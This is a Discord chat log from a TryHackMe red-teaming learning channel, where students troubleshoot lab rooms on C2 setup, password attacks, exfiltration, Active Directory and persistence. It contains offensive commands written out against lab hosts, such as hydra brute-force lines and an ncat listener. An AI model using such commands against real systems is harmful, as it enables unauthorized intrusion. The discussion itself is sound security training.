If this is unclear, think of it this way: if you have ProxyPass "/apps" "http://backend.example.com/" and you try to go to /apps/app1, the request will be proxied to http://backend.example.com/app1
to make your experimentation a bit easier, I'd make two vhosts on different ports to avoid proxying requests back to the proxy recursively
Need help on the Signature Evasion room Task 2. I watched the video on Task 3 plus the hint for Task 2, but I'm still quite puzzled by why the first byte is 51000 when the last byte is 50500 (0xC5FF). Need guidance on this.
some of the question sites, e.g. Red Team OPSEC (task 7), are really vague and feel like an IQ test, as there's zero explanation of what the intent is and you basically have to guess what the task is requiring you to do
getting a load of errors on the C2 armitage part on the attackbox
the UI doesn't load as a result of SSL errors
nvm
getting confused at the C2 tasks and specifically the proxy part
keep getting proxy errors
Hello
on the redteam > host evasion > shellcode section they had this example of a loader in C to put your shellcode in. I can not access it anymore since I'm not subscribed; can someone with a subscription please please get me that loader
Maybe asking for a thing that is behind a paywall on the discord of the site is not so smart?
Yeah, you're right. My apologies, my fellow hackers
I subscribed again and got it
I finally understand a little more shellcodes
.
having issue setting up the lateral moviment room dns to resolved the creds website. it seems i cannot nslookup the domain controller. any possible solution for that?
Hi guys, I have a problem with starting the team server in armitage. I have postgresql version 14.
```
┌──(root㉿kali)-[/home/bodhi/armitage/release/unix]
└─# ./teamserver 192.168.64.3 P@ssw0rd123
[*] Generating X509 certificate and keystore (for SSL)
[*] Starting RPC daemon
[*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg...
[*] MSGRPC backgrounding at 2023-03-11 11:07:46 +0100...
[*] MSGRPC background PID 33564
[*] sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Warning: checkError(): org.postgresql.util.PSQLException: Uwierzytelnienie typu 10 nie jest obsługiwane. Upewnij się, że skonfigurowałeś plik pg_hba.conf tak, że zawiera on adres IP lub podsieć klienta oraz że użyta metoda uwierzytelnienia jest wspierana przez ten sterownik. at preferences.sl:419
** Error ** ** Error ** ** Error ** ** Error ** ** Error **
Could not connect to the Metasploit database. It's possible
that it's not running. Follow the database troubleshooting
steps at:
http://www.fastandeasyhacking.com/start
Also note: the latest Metasploit installer (4.1.4+) does not
create a postgres start script for you. This would explain
why Metasploit's database isn't running. To create one, put:
exec /usr/share/postgresql/scripts/ctl.sh "$@"
in /etc/init.d/framework-postgres. Then start the database:
service framework-postgres start
```
hi guys, do you have any good articles/blogs, etc. about numerous red-teaming ways/procedures on where to find passwords on systems and useful ways for lateral movement?
I am on a red-team engagement and I am running out of options; I don't know where else to look or what to do to get some creds, etc. thanks
i have a problem with armitage
the error is "startup failed, unsupported class file major version 61"
anyone have any ideas on how to solve it?
ok, I know why the java version has to be 11 in order for armitage to be built
thank you for that, better late than never
Gave +1 Rep to @lime patio
Does anyone know how often the email is visited in the phishing room? I've set up the phishing as is described and double checked the different options, but it does not seem like I am getting any hits. Been waiting for around 20 min by now
Anybody know what I'm doing wrong here? I want to say this is a bug but I always assume user error with these things. It's telling me my answer is wrong for the version number in the enumeration room on task 3
```
root@ip-10-10-203-197:~# cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.6 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.6 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```
What is the version number? 18.04.6 << My answer
Looks like you are checking it on your attackbox rather than on the target machine
Thank you
Gave +1 Rep to @native berry
I can't brute force smtp on task 8 of the password attacks room because it gives me this error: either this auth is disabled etc.
I have used smtps and it still gives me this error; anyone know what is occurring?
I had this issue as well. The offensive engineer on my team tried it and informed me to try it over smtps on port 465, I believe. I think he did some kind of netscan to see where it actually was, because it's not the port in the instructions
Alright will try this. Thanks
Ok I am brute forcing web page in password attack room. Trying to find out burgess password, its taking long. Is it supposed to take this long?
if it takes over 5 mins your command/commands are probably wrong
yeah it was that got it
I finished oscp on try hack me what I have to take next
how was it?
I am completely stuck with Task 7 of Red Team OPSEC. The hint does not clarify what the first and the second number in the sequence should be (first number = upper or lower sentences?). That pushes guessing the right combination to a brute force task. Is this intended? also, the hint states to use "-signs while the example in the submit box does not. So what is the format of the answer supposed to look like?
Hi
Your red team uses THC-Hydra to find the password for a specific login page. Moreover, they are using the Metasploit framework on the same system as THC-Hydra. Would you consider this an OPSEC vulnerability?
I answered this question "no", but it is supposed to be yes
How using both tools on same system can cause OPSEC vulnerability?
Hmm, nevermind I re-read relavant section again and figured it out
@gritty mango just wait till you hit Task 7. If you can figure that out, you gotta explain it to me
someone got a solution for the "Unsupported class file major version 61" while setting up armitage?
solved it: downgrade openjdk to version 11 solved it
hi everyone
in the intro to C2 room in setting up the armitage it says build failed
i did a google search and it said that armitage has been deprecated for a long time now
should continue with the attackbox or what?
trying with the attackbox is probably worth it but dunno how to get it working so yeah
Might be a scam beware. Looking at the url can also sometimes tell you.
hello
need your help for breachad vpn error
') if you want to connect to this serve
2023-04-03 11:58:33 ERROR: Failed to apply push options
2023-04-03 11:58:33 Failed to open tun/tap interface
2023-04-03 11:58:33 SIGUSR1[soft,process-push-msg-failed] received, process restarting
2023-04-03 11:58:33 Restart pause, 256 second(s)
getting an error
Are you on a VM?
Hi! Hello! Stuck on Task 8 "Online password attacks" in "Passwords attacks" section of "Initial Access" step. Question 3 :
Perform a brute-forcing attack against the phillips account for the login page at http://10.10.x.x/login-get using hydra? What is the flag?
My hydra command is:
hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^ HTTP/1.1:F=Login failed!" -f
The clinic.lst (that is suggested to be used as per official task hint) was created with:
cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ and it contains 105 words.
The result is false positive. It is the same for other randomly checked wordlists (rockyou) and madeup usernames.
Appreciate any help! Thank you!
UPDATE: The same happens with next Question (asking to attack with POST and differently constructed wordlist).
Do you guys know when the room "https://tryhackme.com/room/introtoisac" will be available?
You can't access it?
you can install an older java version (apt install openjdk-11-jre). Then tell your system to use the old version (update-alternatives --set java /usr/lib/jvm/java-11-openjdk-amd64/bin/java) and armitage should run
does anyone know how to create a custom john rule with a special character at the end? The manual says: ?s but that triggers either an error or nothing
when using a GET request you should change F to S and check for successful logins instead
Question, looking at windows local persistence flag 6 with the txt file. I noticed that my ps1 script does not handle filenames with spaces, as args are separated by spaces. Any better way to handle those?
Can also look for the 302 redirect header
Did you try using " " ?
Try the fuzzing with ffuf it is super fast
It is handled by the system so when you double click the file it sends %1 to the script but the script only sends arg0 to notepad which is everything to the first space
I worked around it by adding space-separated arg1 to 5, but if the path has more then it would still fail opening the intended txt file and thus give away that something is wrong
Fixed it in the ps1 script use arg not arg[0] then it sends all of it
Anyone else struggle with the Data Exfiltration room or is it just me? lol
I had a question for people who have done "exploiting AD" or have AD vulnerability knowledge in general.
When I have access to a child domain controller (say abc.za.tryhackme.loc), would the inter-realm TGT still give me access to the DC of tryhackme.loc?
If not always then under what circumstances?
Lastly, how can the domain trust issue be prevented without causing any issues for the general use(cross child-domain sharing etc)
pls tag me if you answer, thanks
What was your issue?
What's the best certificates to get for red teaming? Been following the recommended path on the website
I've had a few different ones honestly, but pretty sure it's just me being ignorant
I want all name machines active directory in tryhackme
Did anyone else find the Red Team OPSEC room to be confusing as heck? The whole task to get the flag for task 7 was really annoying to me. A lot of the examples felt very vague and confusing.
It all made sense until I did task 7 and then it was confusing ordering the events. (It could be related to me being a noob, but that task just confused me for a few hours)
Also for the weaponization room (task 6) why is it necessary to add -ex bypass to this command after changing the Execution Policy using
PS C:\Users\thm\Desktop> Set-ExecutionPolicy -Scope CurrentUser RemoteSigned?
When I tried to just run
C:\Users\thm\Desktop> powershell -File thm.ps1
it just worked without needing the bypass, after I swapped the execution policy.
Yes, task 7 was really confusing, don't worry about it, a lot of us felt that way
If you changed the execution policy, it is changed for the rest of the shell session I think, so adding -ex bypass should not be necessary I think (I don't know much about powershell, so If someone can confirm this would be nice)
So would -ex bypass be for if I didn't change the execution policy?
In Red Team Engagements, task 8 Operations plan, what does point 2 refers to?
"""In the event of an operator being burnt, information will be kept on a need to know basis"""
Yes, if you don't change the execution policy using Set-ExecutionPolicy you then need to specify the bypass when executing the script
Oh gotcha
otherwise it will use the default execution policy that is not allowing the execution of scripts, so it won't work
:)
Yeah :p Sorry for the late response but thanks for answering!
.
Anyone knows what this refers to?
it was an event on tryhackme when this path was new... you got tickets for completing rooms on this path and when you got 3 for the red teamer role you got it on the site and on here
thx
Gave +1 Rep to @royal void
to get your level role on discord you verify with the bot using the instructions found here
!docs verify
Gave +1 Rep to @tulip mauve
URL For start room ?
what you mean?
htb
having trouble with downloading the lateral movement network vpn config file; trying to import it for the lateral movement and pivoting section, it's like on a loop saying connected then keeps refreshing and dcing
Hello, I am currently in the passwords attack room, and I am having problems cracking the SMTP
I use this command hydra -S -l pittman@clinic.thmredteam.com -P ./clinic2.txt -s 587 -v smtp://10.10.188.149
But I keep getting this error
Could not create an SSL session: error:0A00010B:SSL routines::wrong version number
Can someone please tell me what I am doing wrong? I can't seem to find any useful answers online
the output from hydra -U smtps might help guide you.
Hi
Currently in the Introduction to Windows API room, and how do I go about understanding the syntax in the tasks?
hi guys, I am now in this path and my hope is to become a pentester, so I wonder if this path would help me in my penetration testing engagements rather than red teaming
The most interesting rooms in this path are in Post Compromise, as they show you the steps you should take for penetration testing engagements.
What type of method is used to reference the API call to obtain a struct?
thank you, but I think network security would help, because sometimes you need to bypass some firewalls and IPS
Gave +1 Rep to @regal dust
it depends on the programming language
on the data exfiltration room red team path in task 9 exfiltration over dns my command is not working splitting the content into a single dns request
So I just reached Breaching Active Directory and in the corner, it says I only have 2 days of access left. What does that mean? Will it go back up with my subscription or do I only have 2 days to finish all the networks?
It just means that you'll have to rejoin the room after that, you'll have a different subnet but your progress will remain.
Okay thanks friend! (:
Gave +1 Rep to @small citrus
Is the 7 day streak required for subscriber users as well to access "Red Team Capstone" Challenge??
I'm not sure about this, I saw that it is available to normal users till June 5.
:/
Not going to lie that I'm little disappointed that even membership subscribers have to wait 7 days to get your hands-on to the new Red Teaming challenge.
In the announcement it said something about the streak
Not like you were not warned
I saw the announcement today. Was there an announcement about needing 7 days streak before than today? If there was one then I apologize because apparently I missed that.
the first hint for it was 2 weeks ago where they said to keep up your streaks
You're right. I went back and looked on LinkedIn. Completely missed that post
just posting as some feedback, red team OPSEC task 7 is way too unnecessarily confusing and there's nothing that would really explain what it wants you to do, and even after looking online and understanding what you're meant to do, the questions(statements?) are still incredibly vague and it becomes more of a guessing game than anything
are the armitage tasks completely outdated? It feels like none of the instructions actually work like they should
ok so apparently armitage is deprecated? How should I go through the tasks in that case? is there any point to learning armitage or should I just look up a guide on some other C2 framework?
Good day,
I am trying the windows local persistence room, using attackbox, but even at the first step I am bleeding out. Adding a registry is just not working...
Am I the only one, or is this tricking others too?
same
im trying to build the current release and im running into errors
Windows Internals, Task #2. Logfile.PML is missing for download
Sorry for the trouble, it's on the machine.
I ended up just doing the practical task using metasploit and looked a bit into sliver as an alternative
ohh alright
also were u able to make the vba script using msfvenom and get a reverse shell?
my msword seems to crash any time i run the script
I skipped doing the msfvenom script because I couldn't figure out how to copypaste into the windows VM lmao
I have some troubles with Data Exfil room
In task with http and https I can't curl data to 80 port of web.thm.com
I tried to troubleshoot this problem and found that 80 port is closed
I found only 3 ports opened on this host: ssh (22), one TCP (33963) and one UDP
I can't restart apache (maybe because it is Docker)
What can I do?
I've restarted machine, it works
can someone tell me why im getting this?
do you know why I get this error?
Hi, everyone! When starting to pentesting, is kali Linux image suitable?
Thanks for the replies!
Hey guys, I was going through the Intro to C2 module and faced issues setting up a redirector. I followed the steps mentioned in the module, but all the requests to the redirector are getting forwarded to the C2. Has anyone else faced this issue?
I have added these lines in the /etc/apache2/sites-available/000-default.conf file:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "blahblah"
ProxyPass "/" "http://localhost:8888/"
is going the red team path a good idea or should I just focus on SOC for my first cybersecurity job?
I say do whatever seems fun
tryhackme is a good starting point to understand pentesting, but I'm not sure the certificates they give you for completing a path will necessarily result in a job
They're not certifications.
More like certificates: "Well done, you took part"
It's a good way to show a potential employer that you enjoy learning and doing stuff, even as a hobby.
is it intentional that this AD lateral movement and pivoting room is in the Post Compromise Module?
it shows up twice in the red team path since it's also in the AD module (which is the last module)
and there's like 3 AD rooms that are prerequisites so this placement seems really weird
good question actually
but yeah it has to do with post compromise so shadow thought it fitted in both... still maybe ask some content person
yeah I just found it weird since the room wants you to do AD basics, BreachingAD and ADenumeration first, which all come in order later in the AD module, but that's not everything in the AD module either so now you're doing everything in a weird order
guess it doesn't really matter that much at the end of the day but thought I'd mention it anyway
probably something @white prairie decided... but dunno if he has the power to change it or if it would have to go to others
Lateral Movement and pivoting is a special case. You can technically complete the room in isolation before you do the other AD modules. Since the techniques shown there are Windows techniques more than they are AD techniques. But then revisiting the content as you learn AD will just clear up how local users might get those permissions
thanks for the explanation
Gave +1 Rep to @white prairie
Anyone can help resolving the DNS of THMDC ? i can ping but cant do nslookup ,using NetworkManager
it does not always work as intended even if you are connected to the correct network vpn.... so either try and reset the network or play subnet roulette, where you leave and rejoin the network room to get a new subnet, hoping it works
Alright thank you shadow ,gonna try that
good luck and also have fun
hmm i think i found the issue ,even on attackbox i cant find breach interface
ip address show in terminal
Yup, it's not there
did you start the attackbox from the network room???
i think it's for subscribed memberships, even though they haven't mentioned that
if not that would kinda explain it
Yes i did start it
my brother has subscribed account ,i tried on his pc + account,and it works
what interfaces do you have?
i saw many interfaces but non are named " Breached"
yes, but what do you have?
also was not able to ping the THMDC
do not recall what the one shadow got was... and kinda late to check now
i mean in the attackbox
but its clearly not working for unsubscribed accounts thats why ..
breaching and enumerating active directory are free networks
well not anymore
or maybe there is something wrong happening dunno but im pretty sure
this is from my brother account
gonna sub later and find out
there hasn't been any change, and it's hard to help without all the information
what information u need ?
u can try with unsubscribed account as i did to see if its working
your initial screenshots are from a Kali VM?
yes from my local machine
does that create a new interface for you?
yeah hence the problem is not with the attackbox
but with your current THMDC not doing what it is supposed to
you will need to regen said vpn file if you leave and rejoin the network room too
you probably have to edit your /etc/resolve.conf and have the THMDC IP on top
same steps
2 openvpns one subscribed .. the other is not
works for the subscribed one
but not to the other
very clear what the issue is
Sigh
it's set correctly, and works for the subscribed account my friend
no they do not lock the non-subscribers out from the free networks
if they did why even mark them as free to begin with
well, this issue is there, maybe they are not, but it's there
the problem is you get different subnets and sometimes the THMDC has crashed
hence there are multiple DCs that can handle it if you change subnet
but if you change subnet your old vpn file will not work so you need to make a new one
i tried to change the subnet, i keep getting back to the same one
leave --> join ... repeat
leave wait 3-15 mins... rejoin
regen vpn
connect
try again
technically making people share subnets also cuts costs but they need multiple ones or they will be getting reset all the time or people will break it and other nasties
Both subscribers and free users share the same networks
We don't block or filter your connection if you're a free user, why would we?
oooh thanks for piping in @honest cape
Gave +1 Rep to @honest cape
Also, if you're using your friend's OpenVPN file, it's probably on a different subnet
Hi Jason, thanks for your clarifications, I'm just addressing what I have found and differences, but anyway you are the expert here, thanks a lot for your responses
Gave +1 Rep to @honest cape
Can i DM u please ?
Regarding?
Hello everyone!
May I ask one thing
#room-bugs message
I didn't understand why this is happening and I thought it was a bug.
I'm running snmpcheck in Enumeration (Windows) and I'm not getting a response
Hello, hope this is the correct place to ask this. Anyway, doing Red Teaming Signature Evasion task 7 and I'm trying to understand the answer in the walkthrough. So in the answer it says "If you inspect the binaries IAT table as discussed in task 6, you will notice there are roughly seven unique API calls that could indicate the objectives of this binary." How did they find that number? I've used Objdump -d and also ida pro free version. Is it correct to look at the "Imports" tabs once I've loaded the PE? Like in the picture below?
Sorry, I can't add a picture for some reason. But there are 7 names that call these two libraries, WS2_32 and WSOCK32. Do calls to Kernel32 count?
I'm just having trouble making sense of this, so if anyone has good resources I could read that would be nice. Thanks for the help
I found a post that said snmpcheck has problems and to use snmpwalk which is also built into kali
Hi can someone help me with payload?
looking for help with task 6 in runtime detection evasion have the flag but it says wrong one it is the only flag that comes up after entering the oneline into powershell
Anyone having problems with AutoOpen running the macro?
The program does two things, really -> make a network connection out, and start then wait on a process. The seven calls are all network-related functions, so we're really just hiding from strings/objdump/etc that we make a network connection.
In the enumerating AD room there is no start machine button, when I start attackbox there is no interface enumad neither to find on access page
WHAT am I doing wrong please?
Hi everyone, I am stuck on Data Exfiltration task 6
When i put this command i get :
curl --socks5 127.0.0.1:1080 http://flag.thm.com/flag:80 <p><a href="/flag">Get Your Flag!</a></p>
but i don't get the flag
Can you help me please
maybe try get rid of :80?
curl --socks5 127.0.0.1:1080 http://flag.thm.com/flag
problem Solved
hahah understandable, np
task 3 exploiting ad: i try to create a PS session to thmserver1 and I can't. I already imported all the tickets
im using attackbox
nevermind, figured it out
Hello everyone, im stuck on windows internal room task2
How did you find the ID process for notepad.exe with Procmon
It's good. Problem is solved
use filter and select process name is notepad.exe include
delete the other processes with the crossed-out icon. Thanks
running through the red team path and am on the "red team threat intel" room working on task 7 (trying to map TTPs from MITRE ATT&CK to the Cyber Kill Chain) - I'm looking at the ATT&CK Navigator for APT41 and am super confused as to what I'm supposed to actually put in the kill chain with the first part of the task. does anyone remember this/can help point me in the right direction?
just kidding, I was going backwards
Hi everybody, I can't find the answer to this question
What is the memory allocation type of 0x00080000 in the VirtualAlloc API call?
What type of method is used to reference the API call to obtain a struct?
anyone skilled in armitage?
I have a problem where I dont get my little icons showing inside the GUI window
Does anyone have an idea why I get this error when trying to start the teamserver?
I can't find the armitage.jar file anywhere on my system.
I've installed armitage with apt install btw
find / -iname armitage.jar 2>/dev/null ???
because that would search your entire system for a file with the name armitage.jar not case sensitive and also send errors to the void
@cinder sierra (see above)
armitage has been deprecated a long time ago and some of the room instructions are inaccurate too, which will cause some problems
that room is a skipper imo, but if you wanna do it you might have to do some research on how to make it run
doing it on the attackbox might work as well
thanks shadow! Found it that way, but the next error popped up. Really weird...
Gave +1 Rep to @royal void
Thanks kii! I solved that problem but the next one popped up directly. I'll play around with it a little more and skip it if I can't solve it. What C2 would you recommend that's up to date?
well you could just use the regular metasploit cli, but you can also look at the different ones they listed in task3, personally I installed sliver and looked into it a bit because I thought it looked cool
you can take a look at the c2matrix as well
ICMP Data Exfiltration
i do it with vpn in my machine
i open msfconsole with all setting as in the task
i did nping in the thm@icmp-host machine - but its not seem to sent to my msfconsole to get it
any idea why ?
Hello, I have some trouble with the data exfiltration room (dataxexfilt) at task 7 ( Exfiltration using ICMP)
When I try to run the metasploit icmp_exfil script with the eth0 interface on the attackbox, it says that the interface eth0 does not exist, and indeed it doesn't exist on the attackbox
Should I use another interface instead ?
Or did I miss something ?
Okay, I had to use another interface
what interface did you use here?
let me try it out.
I don't remember unfortunately, but I tried each one until it worked
Make sure the account you are using to transfer the file matches the one you provide to the smbserver script. It looks like you issue the copy command using Administrator instead of thmuser1
I found the solution, I hadn't added it to the "Remote Management Users" group
Thank you @echo ore bts
Btw*
Hi Legends, can you guys share with me your thoughts (and reasons) on why you are diving into #red-teaming-path instead of #offensive-pentesting-path after you've done your jr pentester. I've done my jr pentester 5 months ago and am thinking of a further pathway. Thx legends
Hi
I am getting an error
Error*
In Windows Local Persistence > Tampering With Unprivileged Accounts > RID Hijacking
When I'm changing the RID, evil-winrm is giving this error
And if I try to login without changing the RID, it's giving me access
Does anybody know about it?
I gave all perms
Added in all groups
Already set LocalAccountTokenFilterPolicy to 1
Got the solution
evil-winrm is giving glitches in it
use REMMINA
Instead
Hello,
I'm searching for dedicated CTF players to stick with our team for the long term. We achieved a ranking of 70 on Enowars 7 with just three players. DM me if you're interested
Hi all, I am new to tryhackme, very new to infosec, and my intended career path is red team. Does anyone have any input on which modules to prioritize on the website, aside from the obvious? Thanks
Depends on where you are starting from. Have you any other IT experience? If not fundamentals are important, and such the "fundamentals" modules (or perhaps beginner path?) can be recommended
Yeah, I know some basics, but not like someone who's worked in IT. More like being a hobbyist teen on IRC and Linux.
I've done, on tryhackme, the "Introduction to Cyber Security", and am midway through "Pre Security"
From there, I was assuming I should start with "Red Teaming" next
Also, these modules looked appealing:
-Network security
-nmap
-initial access
-red team fundamentals
-introduction to offensive security
-recent threats
-compromising Active Directory
-Linux fundamentals
Just go for it, if it's appealing and interesting for you it's easier to learn. If you ever get stuck or something is confusing you can always go back to the basics
If it's intended to eventually get a job in red teaming the fundamentals can be quite important, but there are plenty of resources available to research online for what employers want in a red-teamer
Thanks
Gave +1 Rep to @proper root
```
pwndbg> info functions
All defined functions:
File loop.c:
2: int main();
Non-debugging symbols:
0x0000000000001000 _init
0x0000000000001030 printf@plt
0x0000000000001040 __cxa_finalize@plt
0x0000000000001050 _start
0x0000000000001080 deregister_tm_clones
0x00000000000010b0 register_tm_clones
0x00000000000010f0 __do_global_dtors_aux
0x0000000000001130 frame_dummy
0x0000000000001178 _fini
pwndbg>
```
where is the main function?
try info address main Or s *main
Hi everyone. In the "Red Team Threat Intel" room, during Task 7, what's the proper way of finding the answers to these questions?
What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers?
What tool does APT 41 use to mine and monitor SMS traffic?
Is one supposed to read everything in the ATT&CK Navigator page and find the answers? For example for the MESSAGETAP there was no "SMS" keyword anywhere, and for the certutil, there seem to be other answers like "ShadowPad" and "ZxShell"
Yes you should be able to navigate att&ck and find the answers you need, don't just look for the answer, take the opportunity to do some proper research on APT 41
But how would I know for certain which one is the answer to the question without trying all possible answers?
If the APT has multiple tools used for the same thing, you have to try all the ones you think. If none of them are right you are not looking at the right thing.
If one is right and you don't know why, try again and in case you cannot figure it out, look up a walkthrough/write up
The target allows Telnet traffic. Using ncat, how do we set a listener on the Telnet port?
answer: ncat -nlvp 23
no
Why not accept the answer?
try: nc -lnvp 23
i need some help in this task
How can i fix it? ;-;
i tried to research but I can't do it
i try to upload the file loot.zip to BloodHound but it alerts BAD JSON
check if your version of sharphound is compatible with your version of bloodhound
@covert narwhal (see above)
You should use SharpHound.exe. The PowerShell module is the oldest version, so you can't use those JSON files on the new version of BloodHound.
thank you i will try it
@tulip mauve @forest sequoia @static scroll @zealous wind Have you managed to solve the task 10 in Evading Logging and Monitoring?
Hi!
No, it didn't work out.
I've tried a lot of things.
But as if something is wrong on the machine itself.
This was the last task in the module.
I spat on it and just found the flag in the file itself.
Sweet... OK, thanks, task resolved.
Gave +1 Rep to @tulip mauve
What should be configured between two domains for a user in Domain A to access a resource in Domain B? Answer: A Trust Relationship (Don't you think the answer should be B Trust Relationship? It was written to be the opposite direction?)
it is "a" as in the word "a" and not the letter "A"
Unfortunately, completing the learning paths is limited to subscribers only.
Tryhackme is down . Tryhackme website is unreachable wtf
what exactly does it mean when your computers domain is WORKGROUP
From my understanding workgroups are more centralized in access and permissions than on domains.
Hi everyone....I am a beginner in Cyber Security field. Can someone suggest me learning path as well as some useful resources to start my journey.
Should be a basic cyber fundamentals module or pathway.
Any recommended resources?
for me it works best practicing so i just spam rooms
if i get stuck or have literally no idea how to continue i check writeups
although i think this might work better for those who have a bit more knowledge
if you're just starting i'd recommend you watch videos or read some writeups to understand that every ctf is basically the same methodology: enum, exploit, priv esc
i dont speak that language
WORKGROUP stands for non-domain, such as your computer. A domain is used to centrally control multiple clients actually.
ty
hey, I keep getting an error, I did exactly as in the task but Rubeus errors
anyone please help
@white prairie can u help
Which room you finding this in?
Can you authenticate to the domain controller and run gpupdate /force and see if that fixes the issue for you? TL;DR the CA cert expired, we are busy with upkeep for these networks which will remedy the issue, but in the mean time you can just ask the CA to regen its own cert again
what do you mean by that - authenticate to the domain controller
just doing ssh like that?
Remote desktop to the DC using your Administrator credentials, open command prompt, and run gpupdate /force
If that does not solve it for you, let me know and I'll give you the second set of steps for it
Also worth noting that even if PKINIT does not work, you can still use that cert with SCHANNEL authentication through something like certipy. If you ever run into this on an assessment
after gpupdate in the machine i remmina to it
and i try the command again but still
maybe pic not clear but same error
Okay, then we do it the long way around:
On the domain controller:
- Start
- run
- mmc.exe
- File -> Add-snapin
- Look for the Certificates snap-in, but add it for the computer account when it asks
- Expand certificates
- Right click on personal, all options, request new certificate
- Follow prompts and enroll for the available certificate templates
- Once enrolled, should work again
ok i do it
then i choose as in pic 1
but when i arrive to pic 2 it say certificate types not available
@white prairie what u say on that
im really stuck in this
You need to do this on the domain controller. You are currently on WRK1
Domain controller is .101 or .100
This one here:
So whatever your IP is, authenticate to that one and then do the MMC changes there
certificate template
certificate
certificate authority
which snap-in should i choose?
certificate, and then select computer account
Local, since you are already on the domain controller
I think you are still enrolling from the wrong location. Send me the remote IP in your OVPN file and I'll push the fix for you
Not what I'm looking for
but i like to know which part i wrong in the steps of task ?
Open your OVPN file, read the remote IP and send that
Will take screenshots for you
client
dev persistad
dev-type tun
proto tcp
sndbuf 0
rcvbuf 0
remote 54.170.126.211 1194
This one: remote 54.170.126.211 1194. Give me a couple of minutes
after your fix should i do the process again from here?
mimikatz # crypto::certificates /systemstore:local_machine
or i can use my certificate before do Rubeus
See here, the Client Authentication CERT has expired. But the CA cert has not, that is still valid until 2027
Someone shut down the host as I was working. Will wait for a reboot and then enrol the certs
but i like to know if i wrong in the steps or just issue in the domain side?
I think your network time might have run out
You request a cert from the root domain, not from the child domain. The enrolment policy should be on the child domain
Tells me you are enrolling under the wrong policy
wait, i can't login by remmina, it shows like it's logging in and then it crashes out
Please stop
ok
sorry, didn't know..
Enrolment done
See the new certs that are valid until 2024. Your Rubeus attack should now work
Also I'm done on the DC, so you can authenticate to it now
thank you so much. i'll try, just tell me
?
See here: #red-teaming-path message - The CA cert is valid until 2027
so i can use Rubeus with the file i have or all process again ?
I don't want to just give you the answer since I want you to think about it. What did you extract with mimikatz?
So then think about your question. If you extracted the CA cert, which was still valid until 2027, do you need to do that again?
ok gotcha, i'll try direct rubeus
Good luck there
it's done successfully, i appreciate it so much!! thank you @white prairie
Gave +1 Rep to @white prairie
Happy to help, happy hacking!
Hey, how did you login as thmusr3? I got the same problem.
Does anyone know how to fix this in VMware?
hellworld
What are you trying to connect to?
nothing need help in smbrelayattack
anyone know why I'm getting this.. please dm
@vast quest
I updated LinEnum binary list with 144 more binaries
https://github.com/naveen0x/LinEnum
Hey, can you tell me how you got the revshell to be executed. The #unknown room doesn't exist.
When I was working on the Lateral Movement and Pivoting room, connection timed out; no servers could be reached.
problem, but there is no problem with the Exploiting Active Directory room. I am using attackbox. Can anyone tell me how to solve this problem?
hey
i won 2 tickets, can anyone explain to me what the tickets mean and what they are for?
Security Warrior, £5 Swag Voucher
that's an example of what i got
Its for the Security Engineer Learning Path launch.
You can look at the #announcements for details.
i had some issues with that network too. i think i just waited a bit for it to be reset and it seemed to come back alive
In "Data Exfiltration", Task 10 "DNS Tunneling" I am unable to reach the flag webserver at the last question. I assume this is a bug, since I have logged into the webserver per SSH and there is no web server running on port 80 (or any port). I just grab the flag from the source code, but I guess it should get fixed.
I have reported it to the staff and they said it will be repaired in about a week.
Thanks for the update :)
Hello there,
Does someones have troubles with the room "Red Team Threat Intel"?
I'm on task 5 about the Carbanak methods. I loaded the enterprise layer from MITRE ATT&CK in the ATT&CK Navigator. But the data I see doesn't match the responses. For the Command and Control techniques, I've got 16 techniques, but the response is 2.
Same for the signed binary used by Carbanak, I've got a dozen, but there's only one answer.
Has the information changed since this room was created, or I'm wrong?
There are 16 techniques but only 2 of them are highlighted in blue because those were the ones used. Same for the signed binary, it is the highlighted one that is the answer.
Ok, thanks for these explanations
Gave +1 Rep to @fresh coral
Hey guys, I have a question. I want to be a red teamer. I'm doing the Jnr Penetration Tester path. But I'm having trouble grasping the full concept. So can I do the security engineer and coc path first, practice it a little, then come back to the penetration path? What I'm trying to ask is whether I can become a red teamer later by first learning blue team
Hello Guys I'm doing the RedTeam Path and so far I got stuck in room Windows Local Persistence task, the last persistence called Tampering With Unprivileged Accounts and for some reason after assigning the thmuser3 the RID to 500, I'm not able to login via RDP as thmuser3.... Did anyone face this issue while following this room?
thanks
It seems like changing the RID of the low-level user ends up altering the creds as well. I tried a RUNAS command and it tells me that the password is not correct.
Given the network configuration below develop a penetration plan (based on red team):
anyone help me develop a plan real quick? i'm just trying to get into how i would go about penetration testing this config image above
Hey man, do you need networking help or what?
i was just told no one can help me if its academic and i dont want to go against any rules i guess
but i just wanted some clarity
Did you change the RID to 1F4? being 500, i remember that changing the values was a bit of a pain and it messed up the alignment if not done right, you must make sure to have 50 lines of data (0x50) on the left to ensure you have changed the RID of 1010 to 500 and kept the other values in their correct place
I was able to log into RDP after changing these values
And did you use Regedit as the SYSTEM user? Perhaps the changes were not made due to the lack of privileges
Did you use PsExec64.exe to open regedit as a SYSTEM user?
Seeking support with Sandbox Evasion Task 3. The cpp code is not able to be compiled because urlmon.h is missing on the Windows box. I added the header, but then other errors just start mounting up. Couldn't compile on the AttackBox either.
Found this https://stackoverflow.com/questions/70429967/urlmon-h-doesnt-exist-cannot-find-any-solutions-other-than-some-posts-from-2 when searching for answers. Says the environment needs to be set-up for 32-bit, but I can't figure out what to do past this point.
Can someone help me to finish red team C2 communication?
I tried to do a vulnerability scan of PC 10.10.13.105/32, using Eternal Blue, Armitage, but it says
```
msf6 > db_nmap --min-hostgroup 96 -T4 -n -F 10.10.13.105/32
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-18 04:02 BST
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 0.53 seconds
```
sorry, not Eternal Blue, nmap
